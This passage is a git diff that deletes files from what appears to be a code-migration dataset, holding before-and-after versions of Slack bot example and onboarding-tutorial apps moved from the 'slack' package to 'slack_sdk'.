@slack_events_adapter.on("message") - def handle_message(event_data): diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py deleted file mode 100644 index 0669b43..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -# Once we have our event listeners configured, we can start the -# Flask server with the default `/events` endpoint on port 3000 -slack_events_adapter.start(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py deleted file mode 100644 index 3d8c2d5..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py +++ /dev/null @@ -1,50 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -# Once we have our event listeners configured, we can start the -# Flask server with the default `/events` endpoint on port 3000 -slack_events_adapter.start(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff deleted file mode 100644 index 371a353..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff +++ /dev/null @@ -1,39 +0,0 @@ -diff --git a/example/working_with_proxy/example.py b/example/working_with_proxy/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/working_with_proxy/example.py - +++ b/example/working_with_proxy/example.py -@@ -1,15 +1,5 @@ --# ------------------ --# Only for running this script here --import logging --import sys --from os.path import dirname -- --sys.path.insert(1, f"{dirname(__file__)}/../..") --logging.basicConfig(level=logging.DEBUG) --# ------------------ -- - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -@@ -21,6 +11,17 @@ proxy_info = "http://localhost:9000" - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ -+# Example responder to greetings - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py deleted file mode 100644 index 2f70ff7..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py +++ /dev/null @@ -1,65 +0,0 @@ -# ------------------ -# Only for running this script here -import logging -import sys -from os.path import dirname - -sys.path.insert(1, f"{dirname(__file__)}/../..") -logging.basicConfig(level=logging.DEBUG) -# ------------------ - -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# pip install proxy.py -# proxy --port 9000 --log-level d -proxy_info = "http://localhost:9000" -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -if __name__ == '__main__': - slack_events_adapter.start(port=3000) - -# ------------------------------- - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ FLASK_ENV=development python example/working_with_proxy/example.py - -# (Terminal B) -# source env/bin/activate -# (env) $ proxy --port 9000 --log-level d - -# (Terminal C) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py deleted file mode 100644 index e382605..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py +++ /dev/null @@ -1,66 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# pip install proxy.py -# proxy --port 9000 --log-level d -proxy_info = "http://localhost:9000" -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -if __name__ == '__main__': - slack_events_adapter.start(port=3000) - -# ------------------------------- - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ FLASK_ENV=development python example/working_with_proxy/example.py - -# (Terminal B) -# source env/bin/activate -# (env) $ proxy --port 9000 --log-level d - -# (Terminal C) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff deleted file mode 100644 index a762544..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/tutorial/PythOnBoardingBot/app.py b/tutorial/PythOnBoardingBot/app.py - index 2defee516b105112af592dc545a376a893345002..5f4d92a8048814fc4938753594e74d7cfc74c27a 100644 - --- a/tutorial/PythOnBoardingBot/app.py - +++ b/tutorial/PythOnBoardingBot/app.py -@@ -1,7 +1,7 @@ - import os - import logging - from flask import Flask --from slack import WebClient -+from slack_sdk.web import WebClient - from slackeventsapi import SlackEventAdapter - from onboarding_tutorial import OnboardingTutorial - diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py deleted file mode 100644 index 6a76921..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py +++ /dev/null @@ -1,147 +0,0 @@ -import os -import logging -from flask import Flask -from slack import WebClient -from slackeventsapi import SlackEventAdapter -from onboarding_tutorial import OnboardingTutorial - -# Initialize a Flask app to host the events adapter -app = Flask(__name__) -slack_events_adapter = SlackEventAdapter(os.environ["SLACK_SIGNING_SECRET"], "/slack/events", app) - -# Initialize a Web API client -slack_web_client = WebClient(token=os.environ['SLACK_BOT_TOKEN']) - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -def start_onboarding(user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = slack_web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@slack_events_adapter.on("team_join") -def onboarding_message(payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - event = payload.get("event", {}) - - # Get the id of the Slack user associated with the incoming event - user_id = event.get("user", {}).get("id") - - # Open a DM with the new user. - response = slack_web_client.im_open(user=user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - start_onboarding(user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. -@slack_events_adapter.on("reaction_added") -def update_emoji(payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. - """ - event = payload.get("event", {}) - - channel_id = event.get("item", {}).get("channel") - user_id = event.get("user") - - if channel_id not in onboarding_tutorials_sent: - return - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = slack_web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'pin_added' event. -@slack_events_adapter.on("pin_added") -def update_pin(payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - event = payload.get("event", {}) - - channel_id = event.get("channel_id") - user_id = event.get("user") - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = slack_web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@slack_events_adapter.on("message") -def message(payload): - """Display the onboarding welcome message after receiving a message - that contains "start". - """ - event = payload.get("event", {}) - - channel_id = event.get("channel") - user_id = event.get("user") - text = event.get("text") - - - if text and text.lower() == "start": - return start_onboarding(user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - app.run(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py deleted file mode 100644 index 9cdb9ba..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py +++ /dev/null @@ -1,147 +0,0 @@ -import os -import logging -from flask import Flask -from slack_sdk.web import WebClient -from slackeventsapi import SlackEventAdapter -from onboarding_tutorial import OnboardingTutorial - -# Initialize a Flask app to host the events adapter -app = Flask(__name__) -slack_events_adapter = SlackEventAdapter(os.environ["SLACK_SIGNING_SECRET"], "/slack/events", app) - -# Initialize a Web API client -slack_web_client = WebClient(token=os.environ['SLACK_BOT_TOKEN']) - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -def start_onboarding(user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = slack_web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@slack_events_adapter.on("team_join") -def onboarding_message(payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - event = payload.get("event", {}) - - # Get the id of the Slack user associated with the incoming event - user_id = event.get("user", {}).get("id") - - # Open a DM with the new user. - response = slack_web_client.im_open(user=user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - start_onboarding(user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. -@slack_events_adapter.on("reaction_added") -def update_emoji(payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. - """ - event = payload.get("event", {}) - - channel_id = event.get("item", {}).get("channel") - user_id = event.get("user") - - if channel_id not in onboarding_tutorials_sent: - return - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = slack_web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'pin_added' event. -@slack_events_adapter.on("pin_added") -def update_pin(payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - event = payload.get("event", {}) - - channel_id = event.get("channel_id") - user_id = event.get("user") - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = slack_web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@slack_events_adapter.on("message") -def message(payload): - """Display the onboarding welcome message after receiving a message - that contains "start". - """ - event = payload.get("event", {}) - - channel_id = event.get("channel") - user_id = event.get("user") - text = event.get("text") - - - if text and text.lower() == "start": - return start_onboarding(user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - app.run(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff deleted file mode 100644 index d255d1d..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff +++ /dev/null @@ -1,68 +0,0 @@ -diff --git a/tutorial/PythOnBoardingBot/async_app.py b/tutorial/PythOnBoardingBot/async_app.py - index 2defee516b105112af592dc545a376a893345002..5f4d92a8048814fc4938753594e74d7cfc74c27a 100644 - --- a/tutorial/PythOnBoardingBot/async_app.py - +++ b/tutorial/PythOnBoardingBot/async_app.py -@@ -4,7 +4,8 @@ import asyncio - import ssl as ssl_lib - - import certifi --import slack -+from slack_sdk.web import WebClient -+from slack_sdk.rtm import RTMClient - - from onboarding_tutorial import OnboardingTutorial - -@@ -15,7 +16,7 @@ from onboarding_tutorial import OnboardingTutorial - onboarding_tutorials_sent = {} - - --async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: str): -+async def start_onboarding(web_client: WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - -@@ -39,7 +40,7 @@ async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: s - # ================ Team Join Event =============== # - # When the user first joins a team, the type of the event will be 'team_join'. - # Here we'll link the onboarding_message callback to the 'team_join' event. --@slack.RTMClient.run_on(event="team_join") -+@RTMClient.run_on(event="team_join") - async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. -@@ -62,7 +63,7 @@ async def onboarding_message(**payload): - # When a users adds an emoji reaction to the onboarding message, - # the type of the event will be 'reaction_added'. - # Here we'll link the update_emoji callback to the 'reaction_added' event. --@slack.RTMClient.run_on(event="reaction_added") -+@RTMClient.run_on(event="reaction_added") - async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. -@@ -91,7 +92,7 @@ async def update_emoji(**payload): - # =============== Pin Added Events ================ # - # When a users pins a message the type of the event will be 'pin_added'. - # Here we'll link the update_pin callback to the 'reaction_added' event. --@slack.RTMClient.run_on(event="pin_added") -+@RTMClient.run_on(event="pin_added") - async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. -@@ -120,7 +121,7 @@ async def update_pin(**payload): - # ============== Message Events ============= # - # When a user sends a DM, the event type will be 'message'. - # Here we'll link the message callback to the 'message' event. --@slack.RTMClient.run_on(event="message") -+@RTMClient.run_on(event="message") - async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". -@@ -143,7 +144,7 @@ if __name__ == "__main__": - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = asyncio.new_event_loop() - asyncio.set_event_loop(loop) -- rtm_client = slack.RTMClient( -+ rtm_client = RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py deleted file mode 100644 index daf1549..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py +++ /dev/null @@ -1,149 +0,0 @@ -import os -import logging -import asyncio -import ssl as ssl_lib - -import certifi -import slack - -from onboarding_tutorial import OnboardingTutorial - -"""This file serves as an example for how to create the same app, but running asynchronously.""" - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = await web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@slack.RTMClient.run_on(event="team_join") -async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - # Get WebClient so you can communicate back to Slack. - web_client = payload["web_client"] - - # Get the id of the Slack user associated with the incoming event - user_id = payload["data"]["user"]["id"] - - # Open a DM with the new user. - response = web_client.im_open(user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - await start_onboarding(web_client, user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. -@slack.RTMClient.run_on(event="reaction_added") -async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["item"]["channel"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'reaction_added' event. -@slack.RTMClient.run_on(event="pin_added") -async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["channel_id"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@slack.RTMClient.run_on(event="message") -async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data.get("channel") - user_id = data.get("user") - text = data.get("text") - - if text and text.lower() == "start": - return await start_onboarding(web_client, user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - ssl_context = ssl_lib.create_default_context(cafile=certifi.where()) - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = asyncio.new_event_loop() - asyncio.set_event_loop(loop) - rtm_client = slack.RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py deleted file mode 100644 index ecf153f..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py +++ /dev/null @@ -1,150 +0,0 @@ -import os -import logging -import asyncio -import ssl as ssl_lib - -import certifi -from slack_sdk.web import WebClient -from slack_sdk.rtm import RTMClient - -from onboarding_tutorial import OnboardingTutorial - -"""This file serves as an example for how to create the same app, but running asynchronously.""" - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -async def start_onboarding(web_client: WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = await web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@RTMClient.run_on(event="team_join") -async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - # Get WebClient so you can communicate back to Slack. - web_client = payload["web_client"] - - # Get the id of the Slack user associated with the incoming event - user_id = payload["data"]["user"]["id"] - - # Open a DM with the new user. - response = web_client.im_open(user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - await start_onboarding(web_client, user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. -@RTMClient.run_on(event="reaction_added") -async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["item"]["channel"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'reaction_added' event. -@RTMClient.run_on(event="pin_added") -async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["channel_id"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@RTMClient.run_on(event="message") -async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data.get("channel") - user_id = data.get("user") - text = data.get("text") - - if text and text.lower() == "start": - return await start_onboarding(web_client, user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - ssl_context = ssl_lib.create_default_context(cafile=certifi.where()) - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = 